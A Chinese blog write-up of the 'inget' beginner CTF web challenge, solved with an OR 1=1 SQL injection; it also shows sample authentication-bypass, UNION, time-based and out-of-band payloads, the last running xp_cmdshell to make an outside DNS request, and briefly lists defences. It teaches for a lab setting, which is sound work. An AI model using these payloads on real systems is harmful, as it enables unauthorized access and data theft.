【攻防世界】CTF 网络安全学习180天 之 inget

已于 2023-11-15 16:56:31 修改
阅读量531 收藏 3
点赞数 6
分类专栏: 【攻防世界】CTF题库系统学习 文章标签: web安全 sql 网络安全
于 2023-11-15 16:54:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bing_Geng/article/details/134421248
版权

【攻防世界】inget


作者:冰耿
作者其他详细专栏
CTF系统学习专栏https://blog.csdn.net/bing_geng/category_12496105.html
Python爬虫学习专栏https://blog.csdn.net/bing_geng/category_12494819.html

正文

Please enter ID,and Try to bypass
难度:1
方向:Web,SQL注入
题目描述:无

题干界面

在这里插入图片描述

本人思路

  1. 这个题目的题目描述为无,但在进入了题目界面后,提示了这样子的一句话。
    在这里插入图片描述
    翻译过来就是输入id,且尝试绕过,查看源代码,发现源代码只有这一句话,也没有其他信息。

  2. CTF攻防就是信息的整理和收集,然后把所有细节加起来考虑出方向。

    1. 题目 inget,应该是使用get请求的意识
    2. 而提示的那句话,please enter ID,and try to bypass, 猜测应该是以id作为参数,然后尝试绕过

  3. 下面将是我的思路,以id作为参数然后作为绕过
    1)尝试id=1,会出现什么结果。结果就是无事发生,是老样子
    在这里插入图片描述
    2) 尝试把id的位数输大一点,是不是又长度判断.结果还是老样子。然后我猜想是不是id要爆破?所以我在一个虚拟机一边进行了爆破
    在这里插入图片描述
    3) 关键信息里面还有一个很重要的信息就是绕过。所谓绕过最常见的在web安全里面的就是SQL注入,绕过验证。那什么是SQL注入,下面将举几个例子,简单讲讲SQL注入

    SQL注入是一种利用应用程序对用户输入的处理不当而导致的安全漏洞。攻击者通过在用户输入中插入恶意的SQL代码,从而欺骗应用程序执行非预期的数据库操作。这可能导致数据库泄露、数据篡改或未经授权的访问。

SQL注入的常见类型:
Classic SQL Injection:

SELECT * FROM users WHERE username = 'admin' AND password = 'password123';
如果用户输入 admin' OR '1'='1'; -- 作为密码,整个SQL语句变为:

SELECT * FROM users WHERE username = 'admin' AND password = 'admin' OR '1'='1'; --';
效果: 使条件始终为真,绕过身份验证。
Union-Based SQL Injection:

SELECT name, email FROM users WHERE id = 1 UNION ALL SELECT username, password FROM admins;
如果用户输入 1 UNION ALL SELECT NULL, NULL, NULL; -- 作为ID,整个SQL语句变为:
SELECT name, email FROM users WHERE id = 1 UNION ALL SELECT NULL, NULL, NULL; --';
效果: 将两个查询的结果联合起来,通常用于获取额外的信息。
Time-Based Blind SQL Injection:


SELECT * FROM users WHERE username = 'admin' AND password = 'password123' AND IF(1=1, SLEEP(5), 0);
如果用户输入 admin' AND IF(1=2, SLEEP(5), 0); -- 作为密码,整个SQL语句变为:
SELECT * FROM users WHERE username = 'admin' AND password = 'admin' AND IF(1=2, SLEEP(5), 0); --';
效果: 利用延时函数,根据应用程序是否延时来判断条件是否为真。
Out-of-Band SQL Injection:

SELECT * FROM users WHERE username = 'admin'; -- HTTP request to attacker-controlled server
如果用户输入 admin'; EXEC xp_cmdshell('nslookup example.com'); -- 作为用户名,整个SQL语句变为:
SELECT * FROM users WHERE username = 'admin'; EXEC xp_cmdshell('nslookup example.com'); --';

效果: 利用SQL Server的 xp_cmdshell 执行命令,实现带外数据传输。
防范SQL注入的方法包括使用参数化查询、输入验证和限制数据库用户的权限。开发者应该仔细处理用户输入,确保不会被直接拼接到SQL查询中

4)因此我们尝试使用最容易注入的or,就是下面这个语句
?id=1’ or 1=1-- -

意思:在 id 参数的输入后添加了 or 1=1,其中 1=1 始终为真,注释部分 – - 表示在此之后的所有内容都是注释,不会被执行。(那个分号的作用是关闭原始查询中的字符串,然后插入 or 1=1-- -,如果对分号不太熟悉使用位置,可以多次试验)
效果:使查询条件中至少有一个条件为真,通常用于绕过某些权限控制。
末尾的 – - 是 SQL 中的注释符号,它表示在此之后的所有内容都是注释,不会被执行。这是为了确保恶意注入的部分不会干扰原始查询的执行。
5) 运行界面
在这里插入图片描述

总结

1)较为综合的考察了SQL注入绕过,且提示较其他难度为1的题目较少,是一个学习SQL注入的入门经典例题

Bing_Geng
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛ctf题目
CTF网络安全攻防介绍
12-19
主要介绍网络安全攻防安全知识,以及需要的编码和所需要的
dvwa靶场
ing_end的博客
02-26 6206
dvwa靶场 Brute Force (Low) Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。 法一:暴力破解 先随便输一个账号密码不能通过 此时我们进行抓包 通过BP利用字典爆破,得出密码 根据长度的不同可得知password为密码 (medium) 源码分析: <?php if( isset( $_GET[ 'Login' ] ) ) { // Sanitise username input $us
攻防世界-Web-新手-inget
weixin_45653478的博客
03-14 239
flag为:cyberpeace{9d09c60109807334145fe7162ccfdbb0}爆cybert表中的数据。
攻防世界CTF 网络安全学习180 之 inget_please enter id,and try to bypass(1)
最新发布
2401_83620865的博客
04-12 337
SQL注入是一种利用应用程序对用户输入的处理不当而导致的安全漏洞。攻击者通过在用户输入中插入恶意的SQL代码,从而欺骗应用程序执行非预期的数据库操作。翻译过来就是输入id,且尝试绕过,查看源代码,发现源代码只有这一句话,也没有其他信息。这个题目的题目描述为无,但在进入了题目界面后,提示了这样子的一句话。CTF攻防就是信息的整理和收集,然后把所有细节加起来考虑出方向。下面将是我的思路,以id作为参数然后作为绕过。结果就是无事发生,是老样子。Python爬虫学习专栏。方向:WebSQL注入。
Linux服务器意外关机,开机提示一下信息:an error occurred during the file system check
qq_23000805的博客
04-12 1100
解决方法,root密码 执行 fdisk -l 查看磁盘 (Repair filesystem)# fdisk -l 根据看到的磁盘依次修复 ,例如: (Repair filesystem)#fsck -y /dev/sda1 (Repair filesystem)#fsck -y /dev/sda2 (Repair filesystem)#fsck -y /dev/sda3 ...
攻防世界-新手模式2
m0_73960954的博客
10-19 94
本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的。打开只看到Please enter ID,and Try to bypass。本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行。id=1' or 1=1-- -检查后缀中是否有htaccess或ph。检查文件内容是否有php字符串。这里需要绕过的点如下。
[ CTF ]【格】战队WriteUp-第七届“强网杯”全国安全挑战赛
ZXW_NUDT的博客
12-18 2837
第七届“强网杯”全国安全挑战赛
攻防世界 inget
qq_53105813的博客
10-15 938
攻防世界wp
攻防世界WEB练习-inget
不知名白帽的博客
09-01 1万+
攻防世界WEB练习-inget
adworld-web-inget-20221226
32bin的博客
12-26 842
题目来源: 宜兴网信办题目描述:无______||[(]|||__,|||[!
攻防世界-web-inget
mlws1900的博客
08-23 794
这题目搞了半没思路,又是从get里面传参,又是添加了header内容,一点反应都没。
攻防世界-inget(简单的SQL注入、万能密码)
Welcome To Myon'Blog !
04-14 4367
inget(简单的SQL注入)、手工注入、万能密码原理、sqlmap实现、常用参数
CTF比赛网络安全竞赛渗透测试入门资料
06-30
CTF比赛 网络安全竞赛 渗透测试 入门资料
CTF网络安全大赛工具包集合
12-21
针对网络安全大赛的部分方向所需要的工具的集合
ctf网络安全攻防练习题
12-04
ctf网络安全攻防练习题 从N=NP能得到的结论当然是N=1或者P=0,然后结合图片内容,猜测此题跟二进制01有关,信息应该藏在像素中等等
A resource failed to call close.
热门推荐
weixin_44494211的博客
12-22 1万+
安卓开发中使用在OnCreate里面使用SQLiteDatabase数据库执行建表语句发生A resource failed to call close. 的错误 我的解决方法:我的情况是创建数据库的语句不报错,但是执行db.execSQL(sql)报错,解决方法是我的数据库名称和以前的创建的数据库同名了,可以修改一下创建数据库的语句,修改名称。 仅供参考! ...
linux常见命令以及第三方文档库
砚墨
03-17 244
linux常见命令以及第三方文档库 查看系统硬件信息 查看CPU信息 #cat /proc/cpuinfo 或 [root@centos8 ~]# lscpu Architecture: x86_64 CPU op-mode(s): 32-bit, 64-bit Byte Order: Little Endian CPU(s): 8 On-line CPU(s) list: 0-7 Thread(s) per core:
The network is not available,please check your network!
qq_28597467的博客
12-21 5617
Bmob 报错:The network is not available,please check your network! 有时候,AndroidManifest 权限没设置,会报此错误。
ctf网络安全大赛理论题库
07-01
### 回答1: CTF网络安全大赛理论题库是一个包含各类网络安全相关理论问题的题库。这个题库广泛覆盖了网络安全的各个领域,包括但不限于密码学、漏洞利用、网络协议、逆向工程、Web安全等。 理论题库的设计意在检验参赛者对网络安全的理论知识的了解程度。通过解答这些理论问题,参赛者需要展现对网络安全原理的掌握,并能够灵活运用这些知识来解决实际问题。 对于密码学的题目,参赛者需要了解常见的加密算法,例如对称加密算法(如DES、AES),非对称加密算法(如RSA、ECC),以及哈希函数等。同时,还需要了解不同加密算法的优缺点以及应用场景。 在漏洞利用方面,参赛者需要对常见的漏洞类型有基本的了解,例如缓冲区溢出、SQL注入、XSS攻击等。此外,还需要熟悉漏洞利用的方法和工具,如Metasploit、Nmap等。 对于网络协议题目,参赛者需要熟悉各种常见的网络协议,例如TCP/IP、HTTP、FTP、SMTP等,并且了解这些协议的工作原理、特点以及可能存在的安全风险。 在逆向工程方面,参赛者需要具备基本的汇编语言知识,能够分析和理解二进制文件的结构和功能,并能够根据需求对其进行修改和定制。 Web安全CTF竞赛中一大重要的领域。对于Web安全题目,参赛者需要了解常见的Web漏洞类型,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等,并掌握相应的防御策略和工具使用。 综上所述,CTF网络安全大赛理论题库的目的在于考察参赛者对于网络安全的理论知识和实际应用的掌握程度。这些理论问题的解答能够帮助参赛者更好地理解和应对实际的网络安全挑战。 ### 回答2: CTF网络安全大赛理论题库是为网络安全领域的竞技比赛而准备的一系列理论问题集合。这些问题旨在测试参赛者对于网络安全概念、技术和方法的理解和掌握程度。 题库的内容通常涵盖各个方面的网络安全知识,包括但不限于网络攻防技术、密码学、漏洞利用、逆向工程、数据分析和取证等。参赛者需要将所学知识应用到实际问题中,通过解答问题或完成任务来获取积分。 CTF网络安全大赛理论题库的目的是帮助参赛者提高他们的技能和知识水平。通过解答这些理论问题,参赛者能够巩固自己的理论基础,拓宽自己的技术视野,了解网络安全的最新动态和趋势。 参加CTF网络安全大赛的选手应该在备赛阶段充分熟悉题库中的问题,并通过学习和实践来解决这些问题。题库中的问题涉及的知识领域广泛,所以选手需要有全面的网络安全知识储备和技术实践经验。 总之,CTF网络安全大赛理论题库是参赛者为了更好地参与比赛而应准备的一系列理论问题集合。通过对这些问题的认真研究和解答,参赛者可以提高自己在网络安全领域的技术实力和知识水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值